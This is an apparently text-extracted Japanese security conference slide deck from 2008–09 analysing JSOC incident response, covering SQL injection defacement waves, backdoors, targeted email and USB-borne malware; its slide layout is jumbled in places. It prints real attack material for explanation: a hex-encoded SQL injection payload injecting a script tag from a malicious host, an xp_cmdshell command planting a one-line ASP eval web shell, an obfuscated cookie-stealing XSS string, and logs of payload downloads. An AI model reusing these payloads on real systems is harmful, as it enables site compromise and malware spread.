Comments
Description
Transcript
大規模インシデントの裏で進行していること - IPA 独立行政法人 情報処理
~大規模インシデントの裏で進行していること~ 株式会社ラック サイバーリスク総合研究所 [email protected] http://www.lac.co.jp/ 株式会社ラック ITを活用し企業のリスク管理を支援する、次代と経営を拓くセキュリティプランナー 1986年、株式会社ラックは設立されました。”Little eArth Corporation”という社名には、情報化社会の進展で 地球が加速的に縮小してゆく中で、国や企業のIT基盤を支えていこうという理念がこめられています。 独立系セキュリティベンダーとして、日本国内での10年以上にわたる豊富な実績がお客様の信頼の証です。 セキュリティ事業に従事するエンジニア・営業数は国内最大級の規模を誇ります。 商 号 株式会社ラック LAC:Little eArth Corporation Co., Ltd. 設 立 1986年(昭和61年)9月 資本金 11億5,942万6,500円 株 主 ラックホールディングス株式会社(100%) 代 表 代表取締役社長 執行役員社長 齋藤 理 売上高 7,154百万円(22期:2007年12月期) 本社 〒105-7111 東京都港区東新橋1-5-2 汐留シティセンター11F 03-5537-2600(大代表) 03-5537-2610(営業統括本部) セキュリティ監視センターJSOC 〒105-0001 東京都港区虎ノ門4-1-17 神谷町プライムプレイス3F 名古屋オフィス 〒 460-0008 名古屋市中区栄3-15-27 名古屋プラザビル 9F 6,454百万円(21期:2006年12月期) 5,841百万円(20期:2005年12月期) 決算期 3月末日 従業員数 319名 '2008年10月現在( 認定資格 経済産業省情報セキュリティ監査企業登録 情報セキュリティマネジメントシステム (ISO/IEC 27001)認証取得(JSOC) プライバシーマーク認定取得 ■ JSOC (Japan Security Operation Center) JSOCは、ラックが運営する情報セキュリティに関する オペレーションセンターです。高度な分析システム や業界屈指の堅牢な設備を誇り、24時間365日運営 され、高度な技術者を配置しています。ラックのセ キュリティサービスの実績は、2000年の九州・沖縄サ ミットの運用・監視を皮切りに、日本の各分野での トップ企業などを中心に、高レベルのセキュリティが 要求されるお客様にその高品質なサービスを提供し ています。 2 スピーカ にし もと いつ ろう 西本 逸郎 昭和33年 昭和59年3月 昭和59年4月 昭和61年10月 CISSP 福岡県北九州市生まれ 熊本大学工学部土木工学科中退 情報技術開発株式会社入社 株式会社ラック入社 通信系ソフトウェアやミドルウェアの開発に従事。1993年ドイツのシーメンスニックスドルフ社と 提携し、オープンPOS' WindowsPOS(を世界に先駆け開発・実践投入。2000年よりセキュリ ティ事業に身を転じ、日本最大級のセキュリティセンターJSOCの構築と立ち上げを行う。さらな るIT利活用を図る上での新たな脅威への研究や対策に邁進中。 情報セキュリティ対策をテーマに官庁、大学、その他公益法人、企業、各種ITイベント、セミ ナーなどでの講演、新聞・雑誌などへの寄稿等多数 経済産業省 電子商取引等に関する法的問題検討会 委員'2007年~( IPA セキュリティ&プログラミングキャンプ実行委員'2007年~( '財(日本情報処理開発協会 リスク管理統制対応評価検討委員 RSAカンファレンスプログラム委員'2008年( 株式会社ラック 取締役 執行役員 サイバーリスク総合研究所長 特定非営利活動法人 日本ネットワークセキュリティ協会 理事、政策 部会長'現任(、セキュリティ評価WGリーダ/ST作成WGリーダ'歴任( 特定非営利活動法人 日本セキュリティ監査協会 理事 データベースセキュリティコンソーシアム 理事、事務局長 連載・コラム 西本逸郎のセキュリティー表ウラ 熊本大学大学院自然科学研究科在籍 セキュリティー表ウラ 検索 http://it.nikkei.co.jp/security/column/nishimoto_security.aspx 3 緊急対応出動状況 2008 2008年実績 何がほしいのか? CALL 68件 世界的不況で○○が増加? 出動 52件 SQLインジェクション 漏洩系 9件 改ざん系 12件 外部からの不正プログラム注入 8件 内部犯行 9件 MAX 72時間 119 主 対応 治 状況把握:ヒアリングシート、被害内容 ER オペ 原因分析'鳥瞰検査、分析( 致命傷からの脱却 トリアージ、被害拡大防止、暫定再開、対策本部 1W ~ 1ヶ月 復旧 オペ 機能再開 警 戒 運 用 1ヶ月 ~ 1年 回復 完全再開 通 常 運 用 恒常 平常オペレーション 医 高優先度脆弱性対応、検知機構、弱点防御機能 クリーニング スパイラル開発・運用体制整備、緊急事態解除 セキュリティ推進体制整備 セキュア開発、データベース、教育 自主運用 PDCA、PCIDSS適合、認証取得 セキュリティ委員会 4 2008年緊急対応 原因・手口 紛失 2% 他 13% SQL インジェクション ウイルス 17% パスワード クラック 2% 被害内容 侵入 他 6% 6% 情報漏洩 21% DOS 15% 41% 改ざん 27% 6% BOT DDOS 15% Exploit 4% 情報窃取 25% 誰がどこで、 どうやって知った? 100% 出動実績'2008年通期( 90% 80% 計52件'コール68件( 過去最高'当社比( 障害 15% 内部 33% 内部 48% 70% BOT 60% 2007年は43件'通期( 50% 2006年は34件'通期( 40% 30% ※BOT コンピュータウイルスの一種 攻撃者がパソコンを乗っ取るための悪質プログラム。 乗っ取ったパソコンを(ロ)ボットのように意のままに制御する。 外部 67% 20% 外部 52% 内部 35% 外部 50% 10% 0% 5 犯人 犯行場所 検知 2008年緊急対応- SQLインジェクション(41%)の内訳 SQLインジェクションの内訳 1.改ざん 情報窃取 43% 改ざん 57% ① 閲覧者を悪質サイトへ誘導しBOTを仕込む ② 改ざん方法は2種類ある (1)DBの文字型カラムに全て「誘導スクリプト」を追加し、 DB情報を編集しているページが結果的に改ざん'大多数( (2)尐数としてWebプログラムやHTMLに誘導スクリプトを追加 ③悪質サイトは、多重構造になっており、全体像を掴むのは困難 ④下期以降急速に増加 2.情報窃取 ① SQLインジェクションでダイレクトに抜いていくものは減尐傾向 ② バックドア'Webアプリ(を設置しバックドア経由でアクセス (1)POSTでのアクセスがほとんど (2)インジェクションで侵入するタイプと、 保守アカウントの奪取の2通り ③何をやったか分からないようにしている。 ④Webアプリ経由で侵入しWebアプリが狙われる ⑤下期以降、目だった行動は減尐 6 2008年緊急対応 - ウイルス系での被害 Antiny 41% マルウェア 12% BOT BOT 47% ウイルス・BOT被害(32%)の内訳 1.BOT ① 外部のホームページ閲覧 ② USBメモリ'デジカメなど( ③ 標的型メール ④ 今後は偽ソフトによるものが増加? ⑤ 踏台と標的の2パターンある 2.Antinny Winny 経由で、感染するウイルス 内部で発生するというより、自宅など。 相変わらず、発生。 3.マルウェア 内部犯行のため、サーバやパソコンに マルウェアを仕掛けた 7 2008年緊急対応 - 内部(33%)の内訳 1.故意の犯行 過失 47% 故意 53% ① 他人の情報の盗み見 ② 社内DBの内容改ざん ③ 業務妨害'Antinyに見せかけた犯行( 2.過失 ① 紛失 ② Antiny 8 2008年緊急対応 - 内部脅威'48%(の対象 Antinyに似せた暴露事件 Winnyを利用した策略 他 内部犯行 他 28% 内部からの情 報漏洩は、 内部犯だけを 見ても駄目なの か、、 BOT 32% 外部から 単なる踏み台で操作 ・外部へDDoS ・SPAMの踏み台 調査・情報窃取で操作 ・内部ネットワーク ・内部サーバ ・パスワード盗聴ソフトなど 外部から 来た 来た 紛失 4% もともと もともと 内部 内部 Antiny 28% マルウェア 8% 内部の人間が故意に、 内部の情報窃取やDB改ざん を目的に 9 最近の状況 最近、発生していること。 1.サイトからの個人情報漏洩 2.サイトを改ざんし、サイト閲覧者のパソコン にウイルス'ボット(を感染させる。 3.USBメモリからのウイルス'ボット(感染が増大 4.特定組織を狙った標的型メール 今後、偽ソフトを含め、 一般化する危険性大 狙いは、 何だろうか? 10 情報漏洩'窃取( よく見かけるパターン リモートから コントロール インターネット リモートから コントロール ファイアウォール バックドア Webアプリ Webサーバ データコピー バックドアの 情報の窃取 インストール 守っているデータベー スに侵入されるから、 もちろんインジェクショ 何でもし放題。 ンが利くのは問題だが、 どうして気が付かな 気が付かないのは かったのだろうか? もっと問題だ! SQLインジェクション 侵入 バックドア データベース ボット的 バックドア ボット的 11 流行の改ざん攻撃 攻撃も、その後の侵入 手口も、何をやってい るのか実態がつかめな いのか、、 データベース'ホームページ( 改ざん攻撃 POST /index.asp?a=%82%A4';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020 00400054002000760061007200630068006100720028003200350035029002C004000430020007600610072006300680061 007200280032003500350029002000440045043004C0041005200450020005400610062006C0065005F0043007500720073 006F00720020004305500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0610 06D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007 300200061002C0073007900730063006F006C0075006D006E0073002006200200077006800650072006500200061002E006 90064003D0062002E0069006400200061006E06400200061002E00780074007900700065003D00270075002700200061006 E006400200028006202E00780074007900700065003D003900390020006F007200200062002E0078007400790070006503D 003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E0078007 4007900700065003D00310036003700290020004F00500045004E002005400610062006C0065005F0043007500720073006 F00720020004600450054004300480020004E04500580054002000460052004F004D00200020005400610062006C0065005 F004300750072007306F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028040 004000460045005400430048005F005300540041005400550053003D003000290020004200450470049004E002000650078 00650063002800270075007000640061007400650020005B0027002B0400054002B0027005D00200073006500740020005 B0027002B00400043002B0027005D003D007207400720069006D00280063006F006E007600650072007400280076006100 72006300680061007202C005B0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700 740020007300720063003D0068007400740070003A002F002F007700770077002E0032003100310037003900360036002E0 06E00650074002F006600750063006B006A00700030002E006A0073003E003C002F007300630072006900700074003E002 DECLARE @T varchar(255),@C varchar(255) 7002700270029004600450054004300480020004E04500580054002000460052004F004D00200020005400610062006C006 DECLARE Table_Cursor CURSOR FOR 5005F004300750072007306F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004 C04F005300450020005400610062006C0065005F0043007500720073006F0072002000440045004104C004C004F0043004 select a.name,b.name from sysobjects a,syscolumns b 1005400450020005400610062006C0065005F0043007500720073006F00720%20AS%20NVARCHAR(4000));EXEC(@S);-where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or HTTP/1. b.xtype=167) 0{D}{A} OPEN Table_Cursor FETCH NEXT FROM Table_Cursor Connection: keep-alive{D}{A} @T,@C WHILE(@@FETCH_STATUS=0) Content-Type:INTO text/html{D}{A} Content-Length: 0{D}{A} BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script Host: xxxxxxxxxxxxxxxxxxx.jp{D}{A} src=http://www.2117966.net/fuckjp0.js></script>''') Accept: text/html, */*{D}{A} FETCH NEXT FROM Table_Cursor INTO @T,@C User-Agent: Mozilla/3.0 (compatible; Indy Library){D}{A} END CLOSE Table_Cursor DEALLOCATE Table_Cursor 12 12 改ざんサイト 悪のサイトへ 悪質プログラムの 置き場達 利用者 流行の改ざん攻撃 あちゃ、、、orz 無効な%は 除去するの????? 構文エラーとならない? なんで?IIS/ASP さらに巧妙化した攻撃 30.SEP.2008 さらに難読化 2008-09-29 23:27:15 61.152.246.157 - W3SVC1 <ホスト名> <IPアドレス> 80 GET DEC%LARE%20@S%20VAR /対象のWebアプリケーション.asp - 200 <ドメイン名> a_id=4731;b_id=2'%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCA %CHAR(4000)%3BS%ET%20 ST(0x4445434C415245204054207661726368617228323535292C404320766172636 IDS/IPS 検出・防御可否 検出・防御可否 861722832353529204445434C415245205461626C655F437572736F722043555253 @S%3DCA%ST ・・・・ 4F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2 JSOC追加機能 ベンダーオリジナル 07379736F626A6563747320612C737973636F6C756D6E732062207768657265206 製品A × ○ ・・・・e%xec%20(@S) 12E69643D622E696420616E6420612E78747970653D27752720616E642028622E7 DEC%%%%%LA%%RE とか 製品B × ○ 8747970653D3939206F7220622E78747970653D3335206F7220622E78747970653 製品C ○ ○ D323331206F7220622E78747970653D31363729204F50454E205461626C655F437 572736F72204645544348204E4558542046524F4D20205461626C655F437572736F 製品D × × 7220494E544F2040542C4043205748494C4528404046455443485F5354415455533 D302920424547494E20657865632827757064617465205B272B40542B275D207365 74205B272B40432B275D3D727472696D28636F6E76657274287661726368617228 34303030292C5B272B40432B275D29292B27273C736372697074207372633D6874 74703A2F2F64726D79792E636E3E3C2F7363726970743E27272729464554434820 4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40 原則 4320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341 ログなし 5445205461626C655F437572736F72%20AS%20VARCHAR(4000))%3Bexec%20(@S) %3B-- - そうだよね! GETやPOSTでなく、、 そう言えば、昔はGETが危険などと言われてたなぁ、、 13 <sc%ript>al%ert(docu%me nt.coo%kie)</scr%ipt> XSSでも、、、 デフォルト ログなし でも渡せるんだ! 流行の改ざん攻撃 膨大なアプリケーション 改ざん攻撃の やっかいさ、、 Googleなどで 標的確認 リストアップ 侵入や情報窃取の場合 は、一発の攻撃で成功 することはまず無い。 膨大な調査が必要! どこに 穴があるか 分からない 改ざんや破壊のほうが、 簡単なんだ 14 ちょっと変わった改ざん事件 二つのホームページ改ざん でも、これって良く 聞く話だよね。 適当に検索し、 一 無差別に攻撃しDB改ざん 般 的 ⇒結果ホームページ改ざん 当たり外れあり 気づかれ易い DBに侵入後、 フロントのWebのDISKを マウント。 と あ 小さなバックドア'ASP(作成 る 小さなバックドア経由で ケ 多機能バックドア作成 ー Aspファイルを改ざん ス 何が標的型なの? 狙い済ました攻撃 気づかれ難い ホームページが 検索サイトに登録される改ざんサイト 閲覧 改ざんされ 検索キーワードに引っかかる無効な誘導タグ 密かに 別な悪質サイトに 誘導 侵入ポイ ントはここ 不正プログラムが インストールされる DB Web ネットからは直接 アクセスできない 15 ちょっと変わった改ざん事件 小さなバックドア このバックドアをPOSTで呼び出し、多機能バックド アを作成する 以下のようなコマンドをインジェクションし、小さなバックドアを作成する。 exec master..xp_cmdshell „echo ^<%eval(request(“a”))%^> >c:¥inetpub¥wwwroot¥小さなバックドア.asp' <%eval(request(“a”))%^> 以下は上記の小さなバックドアと同じ、デフォルトのページに1行埋め込んだものを配置する。 IISデフォルトインストー ル時のファイルかと 思ったら、一行なんか 入ってる。ログをみても 怪しくないし、、、orz 16 バックドアって? 情報窃取・密かなサイト改ざん 多機能なバックドア この多機能なバックドアを使用して、、 1.更なる侵入・調査 2.パスワード盗聴・ネットワーク盗聴プログラム インストール 3.ASPファイル改ざん などなど ASPバックドアを探してみよう! findstr /I /S gb2312 *.asp? 17 サイト改ざんと潜入ボットがやったこと ボットで何を するかな? 誘導 改ざんされた サイト 悪質サイト お伺い 犯人 一台が踏み台になり、内部 を徹底的に調査されるんだ な。また、どの組織か分 かってやってるのだなぁ。 閲覧 自動 インストール 命令 お伺い Firewall Firewall 手動インストール 内部サーバ 改ざんサイトに アクセスしたPC 恐らく予備機 調査 某会社 その後、これと同等のボットが いくつか見つかった! 某○○、某△△、某×× 侵入経路にはUSBもあった 18 原因は、 ①PCのOS、ブラウザ、ビューワなどに脆弱性があるから ②Firewallで外向き通信の精査が不十分 ③内部のアカウントと権限管理が不十分 某民間企業にやってきた標的型メール 正直、全然怪し くない。 それらし い、書き方! 9月10日 •外務省のアドレスを詐称して発信 •添付ファイルとしてZIP圧縮された.exe •発信元:中国のISP 本当に実在するか、 怖くて確認してな い。 19 某民間企業にやってきた標的型メール 同 じ 週 に さ ら に 一 通 続々やってくる。 次 の 週 に 、 ま た 関係者の誰かがBOTに 乗っ取られていると推測される。 ウイルス対策ソフト は無反応!スパム フィルタも通過! うちはシンクライアン トなので大丈夫! あけちゃえ♪ さ ら に 翌 週 20 USBメモリを経由するマルウェア(事例) 出典: トレンドマイクロWebサイト http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Mal_Otorun1&VSect=S&Period=1y (2008/12/10) 21 USBメモリを通じたマルウェア感染とは Windows Vistaの場合 警視庁システム、ウイルス感染…USB経由? Windows Vista が初期設定のままだと、USB メモリ内に Autorun.inf ファイル と実行 警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と呼ばれる ファイルが入っている場合は、いきなり実行ファイルが起動 新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、22日午後から断続的にオ ンライン業務を停止していることがわかった。 Windows 2000/XPの場合 この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、手 USB メモリ内に、Autorun.inf ファイルと実行ファイルが入っている場合でも、パソコン 作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。 に挿した時点ですぐに実行ファイルが起動することはない。 同庁によると、22日午後2時ごろ、端末のパソコン数台がウイルスに感染しているのを同庁のコン しかし、マイコンピュータから、 USB メモリを認識したドライブをダブルクリック'フォル ピューターが検知した。同庁は感染の拡大を防ぐため、都内101の警察署をつなぐオンラインシステ ムの一部を緊急停止するとともに、ウイルス対策ソフトを配信して駆除作業を実施したが、23日になっ ダのオープン(すると、実行ファイルが起動 ても作業は終わらず、さらに同日、数十台のパソコンの感染が判明した。このため、システムに接続し ているパソコンで行う車庫証明の発行や免許更新の事務手続きも断続的に停止し、各署の窓口では 手作業で対応したという。 サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に感染し た可能性があるとして、同庁で感染経路を調べている。 '2009年1月24日 読売新聞( 出典:IPA 「ウイルス・不正アクセス届出状況について'2007年6月分および上半期( 」 http://www.ipa.go.jp/security/txt/2007/07outline.html 22 USBメモリを通じたマルウェア感染とは 最近話題の、「Downadup」 狡猾な感染 Autorun.infにまつわる様々な課題 不正なサービスが起動 Downadupに感染すると強制的に変更されてしまう。 「ここで自動再生させないように変更する」 一応、自動再生機能は無効化されている。 感染方法 が、公式的なautorun.infの対策 但し、クリックすると感染してしまう。 '1(MS08-067のぜい弱性への攻撃 '2(ネットワーク共有'Admin$(への ブルートフォース '3(USBメモリ経由 23 autorun.infを見つける事ができていない。 USBメモリを通じたマルウェア感染とは 何故、USBメモリ経由で持ち込むのか? 1.便利 圧倒的な手軽さ、便利。格安! しかも、安心できないセキュリティ機能 1.USBを無効にする端末セキュリティ 2.USBで提供されるセキュリティソフト 2.クローズネットワーク 3.セキュリティ対応USBメモリ クライアントは対策してても、サーバ は? パッチ、データ移行。サーバでのUSB使用は意外に多い。 システム構築、保守ベンダー クローズなので、個々の対策は甘い。 3.情報漏洩対策 情報の持ち出しは駄目だが、持ち込みはノーチェック 4.デジカメ 盲点。音楽プレイヤー。ICレコーダ。 5.Autorun・Autoplay神話 24 閑話休題 ファイル共有ソフトによる 暴露ウイルスは相変わらず。 2008年での重要インフラに関係するものだけでも非常に多い。 12月16日 12月08日 12月02日 11月10日 10月21日 10月21日 10月20日 10月03日 10月03日 10月01日 10月01日 10月01日 10月01日 09月09日 09月04日 09月01日 09月01日 07月29日 07月29日 07月01日 06月13日 06月09日 NTT西日本 奈良支店 4,594名分の顧客 埼玉県警 31名分の警察官宴会丸秘写真 日本原子力発電 放射性廃棄物に関する内部資料 KDDI 200名分の顧客 陸上自衛隊 イラク戦争の作戦資料 駒井病院 364名分の患者 横浜市 検査証 宮崎県 西都市 監査資料 給与明細 東京消防庁 448名分の江戸川区民 山形県 議事録 茨城県立中央病院 1名分の患者 106名分の個人情報 JA岡山西 451名分の顧客、口座番号 愛知県 1285名分の個人情報 岩手県 軽米町 特別養護老親ホーム入所希望者 山陽小野田市民病院 患者 大阪府立母子保健総合医療センター 400名分の患者 日本原燃 放射性廃棄物事業の議事録 尼崎医療生活協同組合 91名分の被介護者 3名分の職員 豊岡市 日本管財 旧出石町浄化センターの管理記録 慈恵会 西田病院 患者の個人情報 石川県 62名分の職員 NTT西日本 1,812名分の顧客 06月02日 05月23日 05月10日 05月09日 04月19日 04月16日 04月07日 03月26日 03月22日 資料 03月19日 03月19日 03月14日 03月06日 03月05日 02月15日 02月13日 01月31日 01月15日 01月08日 25 NTT西日本 2,845名分の顧客 山梨県 琴川ダムの内部文書 皇宮警察 内部資料 四国中央市 広報誌の原稿データ 唐津市消防本部 172名分の職員 東北発電工業 火力・原子力発電所の資料 メディコスヒラタ 患者の個人情報、病名 関西電力 検査計画書 日本銀行 松江支店 3社分の破綻懸念先金融機関の検査 東京都 深川消防署 15名分の都民 9名分の職員内部文書 さいたま市消防局 344名分の市民 行政ファイル 関西国際空港 空港の設計資料 北陸電力 鹿島建設 福浦風力発電所の内部情報 埼玉県 さいたま市北消防署 2名分の市民 質問調書 日立製作所 バブコック日立 火力発電所の資料 宮崎大学 医学部付属病院 22名分の患者 かんでんエンジニアリング 火力発電所の工事関係資料 福島第一原発のサーバーID、パスワード 熊本県相良村 187名分の個人情報 犯人目線で、、 あるツール 26 2008年年末のSQLインジェクションお祭り騒ぎ JSOCで検知したSQLインジェクションの件数 驚異的に増加するWebアプリケーションへの攻撃は、2008年12月には前月の100倍以上に急増 300,000 16,000,000 2005年1月~2008年11月 2008年1月~12月 14,000,000 2008年10月は266,257件 ボットによる攻撃 大量の攻撃にまぎれて他の攻撃も 250,000 12,000,000 200,000 10,000,000 150,000 100,000 2004年、JSOC初の SQLインジェクション を検知するJSIGを追加 さらにツールが進化 水面下で売買 検索エンジンの悪用 2008年12月は 約1500万件 11月の100倍以上 8,000,000 ツールによる攻撃が激化 JSOCから注意喚起を配信 6,000,000 4,000,000 SQLインジェクションによる 改ざん・情報漏えい事件 50,000 2,000,000 0 出典: 株式会社ラック JSOC調べ 27 20 08 年 20 1月 08 年 20 3月 08 年 20 5月 08 年 20 7月 08 2 0 年9 08 月 年 11 月 20 05 年 20 1 05 月 年 20 4 05 月 20 年 05 7月 年 20 10 06 月 年 20 1 06 月 年 20 4 06 月 20 年 06 7月 年 20 10 07 月 年 20 1 07 月 20 年4 0 月 20 7年 07 7月 年 20 10 08 月 20 年1 08 月 年 20 4 08 月 20 年 08 7月 年 10 月 0 改ざんサイトを閲覧すると、、、、'年末のお祭りもの( SQLインジェクションの標的とするページを検索 サイトにアクセスすると、、、 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf8&cl=3&ct=262144&wd=ク%20瘁+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:35 JST] "GET http://s1.cawjb.com/jp.js HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp.htm HTTP/1.0" 8&cl=3&ct=262144&wd=々%20基+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/index.htm HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/flash.htm HTTP/1.0" 8&cl=3&ct=262144&wd=蓮%20廚+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s126.cnzz.com/stat.php?id=1117531&web_id=1117531 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfHTTP/1.0" 8&cl=3&ct=262144&wd=猟%20こ+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/Ms06014.htm HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/ie7.htm HTTP/1.0" 8&cl=3&ct=262144&wd=繹%20塹+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/ifff.swf HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://60.196.70.130/cs/jp.exe HTTP/1.0" 8&cl=3&ct=262144&wd=昜%20が+inurl%3A.asp HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:37 JST] "GET 192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfhttp://219.232.243.93/stat.htm?id=1117531&agt=mozilla/4.0%20%28compatible%3B%20msie%206.0%3B%20windows%20nt% 8&cl=3&ct=262144&wd=雙%20砿+inurl%3A.asp HTTP/1.0" 205.1%29&r=http%3A//s1.cawjb.com/jp.js&aN=Microsoft%20Internet%20Explorer&lg=en192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfus&OS=Win32&aV=4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%29&ntime=0.87247700%20122 8&cl=3&ct=262144&wd=る%20蝟+inurl%3A.asp HTTP/1.0" 9676275&repeatip=0&rtime=0&cnzz_eid=21765826-1229676275http%3A//s1.cawjb.com/jp.js&showp=801x611&st=1229676276&sin=-1&res=0 HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:37 JST] "GET http://s1.cawjb.com/jp/ly20088.asp?gameee=WIN%205,0,44,0 HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:44 JST] "GET http://ip.evebug.cn/downjp.txt HTTP/1.0" 192.168.200.128 - - [19/Dec/2008:17:44:44 JST] "GET http://ip.evebug.cn/jp1.exe HTTP/1.0" これで、ボット本体がインストールされ、、、 以降、継続、、 28 改ざんサイトを閲覧すると、、、、'年末のお祭りもの( gov.cn と edu.cn は攻撃対象から 除外 29 2008年年末のSQLインジェクションお祭り騒ぎ 最初は韓国のボットが使用され、、 日本も感染を増やした。 日本、韓国、中国を分けて改ざん埋め込み。 jp.js、kr.js、cn.js 単に、目先の金銭目当てなのか? 2009年12月19日以降JSOC顧客のうち3%程度で内部への潜入と見ら れるインシデントを確認。⇒ 犯人サイドも確認出来ているはず。 並行して、Downadup.A → Bへ'MS08-0678からUSB対応へ( 企業は脅威として 捉えていない。 一般PC 一般PCのネットワーク化 日本の潜入できた、、 組織'ボットの接続元ドメイン(リストが 収集されていて全く不思議ではない。 組織の対策レベルが判明! 30 組織内潜入 キーワード あ ら 標的になっているのは、パスワード周辺 の情報 = アカウント情報 ユーザID、パスワード、メールアドレス 重要インフラでも同様と見たほうが良い 31 犯罪者の費用対効果 狙いたいのは山々だ 残念ながら、この法則は、重要インフラ関係でも同様。 が、ガードが固いところ をわざわざ狙うことは 銀行・証券 無い。こちらも危険に つまり、、、 さらされる可能性が高 くなるし、、 本丸'対策の厳しいところ(を狙いたいのは山々 大手店舗 ⇒ 費用対効果が低い。 こっちのほうが、 しかも'犯人にとって(リスクも高い やりやすいぞ! 中小店舗 対策の甘い・出来ていないところ。自覚が無い。 ⇒うちみたいな 費用対効果が高い! 小さなところ 樽の原則'低い なんて、、 しかも'しかも犯人にとって(リスクも低い ところから水は 永遠にビギ 流れる(は、組 個人さらに、破壊はまだ情報窃取よりやりやすい ナーでいい 織の中だけじゃ じゃん! 個人 重要インフラでの ないんだなぁ、 個人 コンピュータ 個人 個人 は良く分から セキュリティ・サプライチェーンを考えてみよう! ないし、、 中小店舗中小店舗 中小店舗 個人 個人 個人 個人 気がつきもしな いし、安全だ! いざとなったら、 ノーガード戦 法で! 32 一言、言わせてください! 守れ!というセキュリティ セキュリティの教科書 =漏らすな! 皆さんのイメージも、、 事故前提時代のセキュリティ 目線が 全く異なる! もらすなと言われても、なかなかやる気に、、 彼の地アメリカでは、、 =止めるな! ビジネス目線では、、、 稼げ!止めるな!というセキュリティ 33 100年に一度時代のセキュリティ す ご も トリアージ!限られた 資源。限られた時間。 最大限の効果! なるだけ外に出さず 自分達でがんばろう! セキュリティは特殊なも のではない。時代を生 き抜く知恵だ! セキュリティ屋に 騙されるな! 34 一言、言わせてください! 今、露呈している問題 ⇒ 今が原因ではない。 鍵は過去にあり! バッファオーバーフロー SQLインジェクション、XSS 暴露ウイルス 効率性・利便性 USBメモリ 標的型メール 習慣・ブーム 35 本日のキーワード これだけは記憶に 組織内のパソコンやサーバに潜入し、外部から操作。 内部情報を漁る、業務妨害を行なうなど。 従来のウイルス対策だけで潜入阻止はまず無理。 ⇒ 炙り出す作戦。大掃除を! 最終的には人。「セキュリティは情報システム部門で、 ユーザがセキュリティを意識しないように!」が組織の強 度を下げコストを増やす元凶に。 ⇒ ITリテラシとセキュリティ文化が組織力の源泉に 米百俵の精神! 36 株式会社ラック http://www.lac.co.jp/ [email protected] プライムプレイス 3F 37